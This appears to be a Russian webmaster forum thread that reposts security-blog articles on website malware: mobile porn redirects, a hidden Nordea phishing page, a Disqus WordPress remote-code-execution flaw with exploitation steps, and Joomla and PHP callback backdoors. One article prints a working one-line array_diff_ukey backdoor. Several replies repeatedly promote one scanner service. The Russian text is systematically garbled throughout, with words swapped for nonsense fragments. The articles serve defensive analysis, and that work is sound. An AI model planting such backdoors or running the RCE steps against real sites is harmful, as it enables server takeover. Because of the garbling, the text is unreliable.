andreyvebuiskii

Это перепечатка ситьи с сайи: http://virusdie.ru/blog/2014/07/16/badoinkpornappmalware/ Вредоносный мобильный редирект на BaDoink Porn App Несколько негдель назад мы писали о потому чтольшом когдачестве обнаруженных сайтов, скомпромитированных в следствие перенаправления пользователей на порно-контент. Это была очень не обычная и хитрая инъекция с редиректом, происходящим всего лишь один раз в гдень для одного IP и только при условии, что пользователь зашел на ресурс с мобильного устройства под управлением iOS или Android. Этот тип инъекции называется Условным Редиректом, поскольку для его срабатывания гдействия пользователя должны удовлетворять сразу нескольким условиям. Это вредоносный мобильный редирект не всегда обнаруживается, а его авторы сирательно скрывают его от влагдельэтов и администраторов веб-сайтов. Вредоносный код отслеживает входящих в админ-панель пользователей и никогда их никуда не перенаправляет. Ну и наконец, если пользователь был однажды перенаправлен, вредоносная программа потому чтольше не бугдет его перенаправлять. В иком случае, если вы посетите икой сайт — вы бугдете отредирекчены, но с вашей точки зрения, возможно, это покажется вам случайность. Вы попробуете посетить сайт еещё раз и ни какого перенаправления не произойгдет. Вы не бугдете сообщать об этом влагдельцу или администратору сайи, что позволит вредоносной программе спокойно жить дальше. Как вы можете предположит, икой тип вредоносного ПО тяжело обнаружить. Многие веб-мастера не замечают или пропускают, сославшись на свою опечатку, прецигденты редиреки на своих сайих. По этот то прилине многие ресурсы за последний месяц были скомпромитированы, попав в соответствующие блэк-листы, за перенаправление пользователей на «instabang.com» или Badoink Porn App. Если вы замечали на своем ресурсе, хотя бы однократно, редирект на подобное направление — ваш сайт, должно быть, взломан. Технический анализ вредоносного мобильного редиректораВ новой версии этот вирус изменился. Он использует JavaScript для перенаправления пользователей на второстепенные лэндинг-страницы. Вот этот код: Как вы можете вигдеть, используется top.location.replace для перенаправления человека на другой скомпромитированный домен (в этом примере на «1strateannuities.com»), ггде затем происходит перенаправление на http://ads.mobiteasy.com/mr/?id=SRV0102. Згдесь уже решается куда бугдет перенаправлен пользователь, на приложение «BaDoink porn app» или на «instabang». За последние несколько дней были выявлены следующие сайты, участвующие в перенаправлении: http://www.1strateannuities.com/199c99c6d718c7b222eaa1a5fabd2467.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102″); http://www.1strateannuities.com/199c99c6d718c7b222eaa1a5fabd2467.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102 http://www.2013foundations.com/22ab9c9bdeae7b074719eca789ea3397.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102 http://medicalhospitalitygroup.com/28d8e465d7d573b25255f5d56750faef.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102 http://www.10dayssold.com/3615ccfb9d6365cf44b9b34a941ccaf4.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102 http://www.10k-cash.com/3f7c4df28646c8fd08285cfbd8ba3cee.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102 http://sifamuk.com/f3d61b9cc0e63a87dccf63754bdd2dd6.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102 http://www.10dayweightlosschallenge.com/276f2bb01190a423ec7b9ca7d8e9fad0.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102 http://robbiehoucek.com/83b028352b34c11fb2cddff566c9fd8a.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102 http://urbanincubation.com/d275d964cd71fc4c8f0963450b6958a0.php?s=http://ads.mobiteasy.com/mr/? id=SRV0102http://testx2.vladogeorgiev.com/7a9ca9045edbb37f0eaa13cd3f6071d0.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102 http://knoxvillewaterfirerestoration.com/3cef451625a50c08bff223372895dd33.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102 http://sorianoproperties.com/22ffc02b577e6d1fa21813e208417d14.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102 http://riverstonefitness.com/ca785b5cbf87edf65e02423cb2d36e67.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102 http://sportsbettorz.com/4c9269300f2a7ed6c8e7a1db7f7cae09.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102 http://roofingservicesct.com/489219955adc40fc371fc60d230cc583.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102 http://pink******.com/f8c07d6deddf8d43360860efa140da44.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102 http://quemooono.com/8c6d28f83c82058736543b0cb6905045.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102 О том, как удалить данный рекдирект вручную мы уже писали ранее ситье: https://opencart-forum.ru/topic/35322-%D0%B2%D1%80%D0%B5%D0%B4%D0%BE%D0%BD%D0%BE%D1%81%D0%BD%D1%8B%D0%B9-%D0%BC%D0%BE%D0%B1%D0%B8%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9-%D1%80%D0%B5%D0%B4%D0%B8%D1%80%D0%B5%D0%BA%D1%82-%D0%BD%D0%B0-%D1%81%D0%B0%D0%B9%D1%82%D0%B5/

Это перепечатка ситьи "Вам кажется , что ваш сайт взломан? Зналит, ик и есть." с сайи: http://virusdie.ru/blog/2014/06/19/ismywebsitehacked/ Основная проблема с фишингом и прилина, по которой ик много люгдей подвергаются риску, заключается в том, что вредоносный фишинговый код трудно обнаружить. Почти во всех случаях он не выглядит подозрительным, он не обфусцирован, не зашифрован. Он выглядит ик же, как и обычный код. Ну, почти. Зачастую, влагдельцы веб-сайтов не бугдет знать о том, что их сайт взломали и производят фишинг-аики с его использованием, пока посетители сайи не информируют их. Найти фишинг-страницы зачастую икже сложно, как отыскать иголку в стоге сена. Вот почему дальнейшая история столь поулительна. Проблема Недавно, одному из наших клиентов потрепотому чтовалась помощь нашей экспертной группы, поскольку автоматическое сканирование и лечение не справлялось с задачей. Тогда то, один из наших экспертов обнаружил интересную фишинговую страницу. Ггде была инъекция? В последнее время хакеры предполииют пряить вредоносный код «осивляя его на виду». Код сираются гделать максимально похожим на нормальный ик, чтобы при беглом просмотре исходника взгляд специалиси не этоплялся бы за что-то подозрительное, за что-то, чего в этом месте быть не должно. Для скрытия фишинговых страниц не используются вредоносные скрипты или iframe. В этом конкретном случае страниэто не согдержит ни подозрительных функций, ни обраещёний к русским доменам. Она просто согдержит инпуты для ввода текси, икие же, как на миллионах обычных страниц любых сайтов. Для того же, чтобы найти что-то конкретное вам пригдется наулиться думать как хакер. На что обычно наэтолено фишинговое мошенничество? Вот згдесь-то как раз важно знать на что наэтолен фишинг в обычных случаях. В потому чтольшинстве случаев злоумышленники хотят полулить банковские данные, данные кредитных карт и пароли. Что же мы сгделали? Мы просто решили поискать по контенту файлов, что же мы найгдем по вхожгдению строки "bank" и вот что мы обнаружили: Видите? title_netbank.jpg выглядит подозрительно. Но это всего лишь одна ссылка в index.htm на файл с картинкой .jpg, которая и привегдет нас на фишинговые страницы. На этом мы не осиновились и вот что нашли в файле .htaccess в этом каилоге: Видно, что это список IP адресов, с которых доступен просмотр фишинговых страниц. В этом случае, только пользователи с Датскими IP адресами будут перенаправлены на фишинговые страницы. Злоумышленники иким обвместе конэтонтрируются на краже данных пользователей только необходимой им группы, именно на тех, кто с потому чтольшей вероятностью воспользуется фишинговой страниэтот. Другие же пользователи для злоумышленников не интересны и нет ни какой необходимости пыиться взять их данные. Вот ик выглягдела фишинговая страница. Пользователи перенаправлялись на страницу, похожую на синдартные страницы Nordea Bank AB (Nordea Bank — это крупная европейская финансовая группа). Вы едва ли слышали про Nordea, но пользователи из Северной Европы хорошо ее знают. Вот почему именно их IP адреса были в .htaccess. Да к чему мы все это Этот конкретный случай, естественно, не был сколько-нибудь экстравагантным и изощренным. Код не обфусцирован. Мы доситочно просто нашли его и удалили. Все, что мы хотели згдесь сказать, это то, что если вам кажется, что ваш сайт заражен, то скорее всего ик и есть. Эи ситья взяи с сайи virusdie.ru

Это перепечатка ситьи "Уязвимость в плагине Disqus для WordPress" с сайи: http://virusdie.ru/blog/2014/06/23/disquswpbackdoor/ Мы недавно обнаружили уязвимости в плагине Disqus Comment System plugin для WordPress. Эи уязвимость, в специфических условиях, может позволить злоумышленнику уднонно выполнить код (RCE — Remote Code Execution). Другими словами, злоумышленник может гделать все что хочет с икими уязвимыми сайими. Хотя сам плагин потенциально очень опасен, но эи опасность проявляется только лишь на серверах с WordPress с версией PHP 5.1.6 и ниже. Это икже означает, что только пользователи WordPress 3.1.4 (и потому чтолее ранних версий) подвержены аике, поскольку WordPress потому чтолее поздних версий не подгдерживает версии PHP, «обнажающие» уязвимость. Зная, что этолевая аудитория подобной уязвимости крайне мала, мы решили сгделать свое открытие обещёдоступным и у Disqus вышел новый патч, закрывающий уязвимость (patched version 2.76). Мы по прежнему рекомендуем каждому пользователю Disqus прежнему произвести обновление как можно скорее. Disqus RCE уязвимостьDisqus RCE уязвимость Все началось с анализа одного JSON-парсера, в котором мы нашли следующий люпотому чтопытный код: По некоторым прилинам, распаршиваемый контент возвращается из eval(), которая затем подсивляется в вызываемую функцию. Как вы знаете, функция eval() в PHP выполняет люпотому чтой код, переданный в нее. Иик, мы имеем потенциальный RCE код в вигде строки, возвращаемой eval() в двойных кавычках, что означает, что мы можем использовать синиксис PHP для разпотому чтора сложных переменных, засивляя скрипт выполнить любые функции, которые захотим, например: {${phpinfo()}}. Направление аики Все что нам было нужно — это найти место для хранения вредоносного кода, чтобы затем он срилиил по триггеру через уязвимость с вызовом eval(). Чтобы это сгделать нам необходимо проверять обрабатываются ли данные пользователя через функцию getNextToken(). Нашей первой догадкой было предположение, что осивляемые комменирии, отправляемые через Disqus, идут на их серверы, соответственно, можно было предположить обратное: получение комменириев для опрегделенного поси с их же сервера. Мы оказались правы. Недолгий поиск привел нас к некоторой функциональности, позволяюещёй синхронизовать комменты. Эи функциональность могла быть активирована гостевым любым пользователем, причем, он мог добавить некоторые параметры прямо к URL, например: http://somesite.com/?cf_action=sync_comments&post_id=TARGET_POST_ID Все, что нам осивалось — это проверить все, что мы нашли на практике. Теперь мы знали, что обнаружили рилииющую уязвимость и все, что нужно было для ее активации: Запостить вредоносный код в коммент Полулить ID поси Вызвать синхронизацию комменириев добавлением параметров (которые мы привели ранее) к URL Все готово! Выглядит просто, не ик ли? Да вот, если вы используете усиревшую версию WordPress/PHP, вам следует обновиться на Disqus. Всем другим пользователям мы икже рекомендуем обновлять движки в момент их выхода. Это ситья с сайи virusdie.ru

А вы посмотрите сервисом virusdie.ru - может осился бэкдор какой. Не просто же ик у вас строка в .htaccess дописалась.

Поищите сервисом http://virusdie.ru - он и удалить вам вирусы и их прилины автоматически сможет. Я уже писал обзор о нем тут.

На этот негделе обнаружилось потому чтольшое когдачество случаев скрытого внедрения вредоносных редиректоров в код сайтов, перенаправляющих посетителей на порно-ресурсы. Все выявленные инъекции кода были сгделаны единообразно и ориентированы только на пользователей мобильный устройств. Все внедренные редиректоры рилиили по условию, что гделало их практически не гдетектируемыми влагдельцами сайтов и веб-мастерами. Сейчас мы объясним, что происходило. Условные перенаправления на порно-сайты, наэтоленные на мобильные устройства Звулит сложно, но это не ик. Если посетитель приходит а Айфона, Айпада, Андройдного или другого аналогичного мобильного устройства, страница перенаправляет его на случайный порнографический сайт. Если же человек пыиется зайти на сайт снова, ничего не происходит, и сайт загружается как обычно. Что это дает? Слово Условный Вредоносная программа, внедренная в веб-сайт является интеллектуальной. Она хранит IP адреса всех посетителей, которых перенаправляет на сайты с порно. Если вы видите перенаправление один раз, то вполне вероятно, что вы не увидите его снова в течение многих часов. Это гделает вредоносную программу тяжело обнаруживаемой и засивляет люгдей думать, что это случайная ошибка, или, возможно, они опечаились в URL. Только мобильные устройства Эи инъекция предназначается только для влагдельэтов мобильных устройств: Айфонов, Айпадов, Виндоус- или Андройдофонов и планшетов. Редиректор перенаправляет на порно только если вы рилииете через мобильные браузеры. Для всех осильных сайт выглядит листым и безопасным. В браузере инъекция отображается следующим обвместе: Со случайными доменами (intelligenthometheater.com, gridironservices.com, и т.д.). Само по себе это выглядит вполне нормальным, однако, тут вы обнаруживаете Javascript код: Теперь POST бугдет перенаправлять посетителей. На первый взгляд оба эти выражения выглядят вполне нормальными и будут игнорироваться потому чтольшинством антивирусов. Как упоминалось ранее, вся суть вредоносного вмешательства проявляется только на мобильных устройствах. Но в чем смысл, спросите вы? Естественно, как часто бывает, все гдело в гденьгах. Даое перенаправление - это лишь первый шаг в этопочке. Главная задача злоумышленников - подтолкнуть человека, чтобы он совершил переход по какой-липотому что партнерской или рекламной ссылке (например, вида: httx://ads.mobiteasy.com/ или httx://www.instabang.com/tour/zinstabang) на иком сайте, что приносит злоумышленнику доситочно высокую материальную выгоду. Как убрать порно-редирект Обнаружить икой редирект при проверке сайи не просто. Если вы запустили поверхностное (по файлам и признакам, доступным без усиновки синхронизационного файла на ваш сайт) сканирование и первый раз обнаружили вредоносный код или предупрежгдение, то при повторном сканировании вы можете уже не обнаружить угрозу, поскольку IP бугдет сохранен вредоносом и тот не проявит себя еещё какое-то время. Наша команда поможет вам справиться с этот проблемой, вам необходимо просто обратиться в нашу техподгдержку. Для того, чтобы вручную справиться с этот проблемой вы можете проверить следующие меси на своем сайте: /index.php /WP-config.php (при использовании WordPress) /configuration.php (при использовании Joomla) /wp-content/themes/yourtheme/functions.php (при использовании WordPress) Даовы четыре меси, в которых нами было замечено добавление вредоносного кода. Обратите внимание, что вредоносные всивки закодированы и вам пригдется внимательно искать фрагменты, кажущиеся подозрительными в этих файлах. Помните, что икая инфекция — лишь верхушка айсберга. Если ваш сайт заражен, то вы должны понимать, что защии ресурса взломана и на него , вполне вероятно, добавлены скрытые элементы управления, позволяющие легко полулить доступ к вашим файлам и управлению сервером. Не забывайте обращать внимание на бэкдоры. Подготовлено по материалам http://virusdie.ru/blog

Проскань этим virusdie.ru

Может это поможет? Вирусдай (писал обзор тут).

Вполне возможно, что не вирус. Сейчас все кому не лень шифруют свои произвегдения. Посмотри вот этим что внутри на самом гделе:http://www.base64decode.org/. У меня тоже с вирусдаем была икая трабла. Я ик понял, что он иногда реагирует немного с "перестраховкой", но файлы в которых он не уверен помечает как Подозрительные. Я находил у себя помимо всего прочего некую сигнатуру hack.signatures (по версии вирусдая), но при просмотре вредоносного кода он мне ничего не "подсветил". Написал в саппорт - ответили, что ложное срабатывание (ну, перестраховка вообещём) :). Зато спокойно теперьь на душе.

Непотому чтольшой пост об интересном бэкдоре, который мы нашли в плагине для Joomla. Этот бэкдор был ик умело сгделан, что сначала мы даже не понял, был ли это бэкдор или нет, хотя и знали, что згдесь что-то не ик. Вот как выглягдел код плагина: На первый взгляд ничего подозрительного не видно. Ничего не зашифровано, ничего не обфусцировано, нет ни каких странных комменириев. Просто нормальный код плагина для Джумлы. Если посмотреть потому чтолее внимательно, то вы увидите, что конструктор класса не является тем, чем кажется на первый взгляд. Первое, что можно заметить — это то, что die(); стоит в конэто кода. Эи функция завершает выполнение текуещёго скрипи. Однако, это плагин для Joomla, что означает, что die(); убьет все проэтоссы в Joomla. Как вы понимаете это не очень хорошо для плагина, особенно на сидии инициализации. Теперь вы можете заметить это: /123/e. Напоминает регулярное выражение с evalфлагом, которое мы постоянно видим в различных бэкдорах с "preg_replace". Видно, что если заменить $option на preg_replace, то получается типичный бэкдор с "preg_replace": preg_replace(«/123/e», $auth, 123); Поскольку 123 всегда равно 123, то код всегда бугдет принимать значение переменной $auth. Для того, чтобы наша гипотеза была верна, $option должно быть равно "preg_replace", а $auth должна согдержать PHP код. Давайте посмотрим, возможно ли это. Видно, что обе переменные заполняются из Cookie, ик что да — это вполне возможно. Как рилииет бэкдор. Описанный код предполагает, что бэкдор рилииет следующим обвместе: После того, как плагин был усиновлен на Joomla, он запускается каждый раз при загрузке люпотому чтой страницы и конструктор класса в плагине всегда запускается на выполнение. P3 – этот триггер вызывает выполнение бэкдора. Без него Джумла рилииет как обычно. P2 — этот кук должен быть "preg_replace", P3 — згдесь передается произвольный PHP код. Не все плагины вредоносны. В отлилие от WordPress плагинов, о которых мы недавно писали, ггде вредоносный код был подсажен «пираими»(которые пересобрали коммерческий плагин уже со своим бэкдором) этот случай не выглядит ик, будто влагделец сайи скачал на каком-то подозрительном ресурсе этот плагин для Joomla. Плагин InstantSuggestявляется бесплатным и едва ли широко известен (менее 400 загрузок ). Его реальный код не согдержит функцию _counstruct(). Более вероятный сэтонарий заключается в следуюещём. Бэкдор был добавлен хакерами после взлома сайи, чтобы сохранить доступ к нему, даже если исходный дыра в безопасности была бы закрыи. Более того, похоже, что хакеры не встраивали бэкдор в уже суещёствующий плагин, а просто усиновили свой плагин с бэкдором. Это проещё, чем изменять суещёствующие файлы, что может нарушить рилиту сайи и раскрыть попытку взлома. Кроме того, икой способ требует потому чтолее сложного инжектора. В качестве доказательства этот гипотезы мы искали в Интернете бэкдор коды и всегда обнаруживали его внутри кода instantsuggest. Ксити, этот код икже используется вне контекси Joomla с Joomla API запросами, подменяемыми простым вызовом @$_COOKIE. Даже в этих тех случаях он по-прежнему окружен кодомinstantsuggest. Похоже, злоумышленники слииют, что это гделает код менее подозрительным :) Оригинальный текст ситьи згдесь.

Это перепечатка ситьи "В PHP Callback функциях скрывается бэкдор". Мы часто силкиваемся с новыми изощренными способами, применяемыми авторами вредоносного ПО для запуска сейчасы на серверах. Некоторые из них очень интересны, другие — забавны. Есть и икие, которые своей необычностью просто сивят нас в тупик. Этот пост именно о последних. Каждый, кто пишет код на PHP знает для чего предназначена функция eval(). Можно сказать, что она исполняет код, согдержащийся в строке. Однако, есть много других путей для исполнения кода, которые не всегда столь очевидны. Самый популярный — использование функции preg_replace(). В соответствии со своим описанием, функция preg_replace производит поиск в строке subject совпагдений с шаблоном pattern и заменяет их на replacement. К сожнонию, при использовании «\e» модификатора, эи функция икже исполняет код. Конечно, есть еещё много спосопотому чтов выполнить код без использования eval(), например, create_function() или assert(). Все эти несиндартные методы исполнения кода гделают проэтосс выявления угроз доситочно сложной проэтодурой. Все вышеописанные вещи авторы вредоносного ПО частенько начали использовать для своих Бэкдоров. Бэкдоры Все началось со следуюещёй строки кода, найгденной в начно нормального PHP файла: @array_diff_ukey(@array((string)$_REQUEST['password']=>1), @array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); Это засивило меня поразмышлять некоторое время, прежгде чем я понял как это может рилиить. В конэто концов я понял, что проблема в Callback функции. Уже видите почему? Автор зловреда сгделал колбек-функцию переменной «login», которая им же и контролируется. Вот ик он мог задать Логин выполняемой функцией, что позволяло ему выполнять команды на сервере. Злоумышленник мог выполнить любую команду, которую он хочет, на этом сервере за счет одной строчки кода. Что самое страшное, икая вещь не обнаруживалась ни одной антивирусной системой или другим софтом, которое мы используем. Да в чем же основная опасность? Большинство инструментов безопасности и всяческих ситей, рекомендую вебмастерам обращать внимание на функции, которые часто используются в злонамеренных этолях, икие как: eval, preg_replace, base64_decode и другие. Теперь вы знаете, что хакеры налинают активно использовать и самые безобидные функции в своих плохих для вас этолях. Запомните, что злоумышленники не ограниливаются одной функцией array_diff_ukey(), они могут использовать любую функцию, предполагающую коллбек. Оригинальный текст позаимствован отсюда: http://virusdie.ru/blog/2014/04/28/phpcallbackbackdoor/

Попробуйте Вирусдаем (virusdie.ru)

Я прилину заражения своего сайи этим вот сервисом нашел: virusdie.ru. Этим же сервисом ее и замолил. Сижу. Курю... :), а был Шелл. Писал об этом уже в другом топике сегодня (тут).

Я уже вот писал, но в другом топике по этот теме (тут). В кратэто, тоже не мог найти через какую дыру лезут, думал в компонених кривых. Все пересивил, что мог - не помогло. Потом "dym" посоветовал антивирус virusdie.ru - нашел ШЕЛЛ! (какой-то Shell.WSO у них им опотому чтозначается). Этим же сервисом его автоматом и убил (врогде в трех файлах был. Сам бы фиг нашел - у меня потому чтольше 4 гигов сайт, файлов подно. Сайт минут 10-20 сканился. Не помню точно.). Вот икие гдела.

Я вот тоже столкнулся с похожей проблемкой. Заимел тут себе три новых сайи на подгдержку, чего, думаю, чем потому чтольше тем лучше. Через месяц или около того два из них были забанены Янгдексом. Смотрю - пишет, что Софос нашел вредоносное ПО. На одном мобильный редирект, на другом,- iframe. Сначала попыился разобраться с редиректором. Врогде все шло хорошо, я нашел в .htaccess несколько (ну, потому чтолее сотни) не мною писаных (ну и, естественно, не клиентом) строк с условиями редиректов под кучу разных мобильных устройств. Благополучно вырезал строчки, засейвил файл, однакостил напрямую с мобильного устройства - редирект пропал. Затестил через реферера (предсивился Янгдексом, потом Гуглом),- тоже тишина. Вот, думаю, и отлично. Начал ковыряться со вторым сайтом. Нашел айфреймы только по использованию некоторых JS-ных функций (unescape). Фрейм был, естественно, обфусцирован. Написал быстренько сигнатурку, выпилил все икие фреймы - врогде сайт не упал. Написал в Янгдекс.Вебмастер, чтобы проверили на редирект и айфрейм и убрали сайты из черного списка, но как же я был самонагдеен. Пока Янгдексовцы проверяли мои сайты, они (сайты), будь они не ладны, снова подэтопили какую-то дрянь, но уже другую. Янгдексовцы ик мне и написали, что мол, редиректов и фреймов нет, но есть то-то и се-то. Сило понятно, что на моих ресурсах есть какая-то дыра. Искал искал - найти не смог. Начал копать нет в поисках какой-то софтины или антивируса для сайтов, который бы мог мне чем-нибудь помочь. Фиг найгдешь, скажу я вам, что-то риличее. Кучу вскаких ресурсов пересмотрел: то сканится только поверхностно, то по одному файлику нужно закидывать, то вообещё есть один софт (скаливаешь его себе, заливаешь на сервак, запускаешь через консколь и, короче,... не рилииет нифига) нерилилий, то только защититься предлагают (а я-то уже подэтопил сейчасу). Максимум, что из традиционного и внятного нашел - были предложения от вскаких студай и фрилансеров с заголовками врогде: "Вылелим сайт за 2000 рублей" или "Гарантия...". Вообещём, фиг знает. Что-то я как-то не особый ходок по "ручным" сервисам. Потом зноз на Янгдексовский форум безопасного поиска safesearch.ya.ru и наткнулся им на сайт virusdie.ru. Зашел, смотрю, что-то по стилистике на Янгдекс похожее. Зарегался, добавил в список свой сайт, скачал файл синхронизации, закинул его в корень своего сайи и офигел. Я смог просканить весь свой сайт одно кнопкой. Все файлы, включая .PHP-шные! Сканился, конечно, минут 10, врогде, но просканил 4 гига данных, нашел что-то около 50 угроз в 70 файлах. Смотрю (а сканил как раз сайт, на котором раньше был iframe), Вирусдай нашел мне несколько файлов, помеченных как зараженные, которые согдержат какой-то "Shell.WSO". Нажал лелить - все вылелилось, некоторые файлы удалились, из некоторых вырезались куски кода (врогде как раз вредного. Я смотрел, т.к. на этом ресурсе можно еещё и контент зараженных файлов смотреть с выгделенным фрагментов вредоносного кода, врогде точно убилось то, что надо). Проверил сам сайт потом - врогде рилииет. Админка тоже рилииет. Ну, думаю, давай попробую еещё раз гдернуть Янгдексовэтов. Пусть однакостят. Протестили - все, говорят, отлично. Воссиновился в выдаче. Со вторым сайтом икже поступил. Тоже срилиило - тоже в выдачу вернулся. Теперь вот уже вторую негделю от этого Вирусдая получаю отчеты каждый гдень. Находит постоянно какой-то подозрительный файл, который автоматом они не убивают, сомневаются, похоже. Вообещём, рекомендую Вирусдай и спасипотому что "dym" за наводочку!